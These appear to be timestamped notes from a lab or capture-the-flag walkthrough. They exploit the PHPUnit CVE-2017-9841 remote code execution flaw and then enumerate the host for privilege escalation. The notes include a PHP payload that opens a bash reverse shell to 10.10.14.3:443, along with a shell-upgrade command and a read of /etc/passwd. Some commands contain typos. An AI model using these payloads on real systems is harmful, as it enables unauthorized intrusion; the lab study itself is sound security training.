Reading C codes was hard.
00:45 PHP Unit vulnerability found
OffSec’s Exploit Database Archive
PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated). CVE-2017-9841 . webapps exploit for PHP platform
www.exploit-db.com
https://github.com/vulhub/vulhub/blob/master/phpunit/CVE-2017-9841/README.md
github.com
01:14 Modify request on Burp Suite to show phpinfo()
Content-Type: application/x-www-form-urlencoded
<?=phpinfo()?>01:42 Sending reverse shell instead of phpinfo()
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/443 0>&1'");?>01:50 reverse shell successful
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’02:03 Looking for privilege escalation
ss : ss (socket statistics) tool is a CLI command used to show network statistics
ss -lntp
ss -ant
ss -ntp02:09 Try to find something an user owns
find / -user www-data 2>dev/null | grep -v ‘/proc\|/run\|/var/www’02:28 Investigate exe file found
strings lists the printable strings from within a binary file
CyberChef
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
gchq.github.io
02:57 check /etc/passwd for users
cat /etc/passwd | grep 'sh$'03:35 Try to find fishy files with timestamp
find / -type f printf "%T+ %p\n" 2>/dev/null | grep 000000 | grep -v '/sys\|/proc\|/run'find / -type f printf "%T+ %p\n" 2>/dev/null | grep 00:00:00 | grep -v '/sys\|/proc\|/run'04:17 Reading C code. Reverse Engineering.
The strcmp() : compares two strings character by character. If the strings are equal, the function returns 0.
The ^ (bitwise XOR) in C or C++ takes two numbers as operands and does XOR on every bit of two numbers. The result of XOR is 1 if the two bits are different.
(byte *) Interpret this pointer as a pointer to byte data
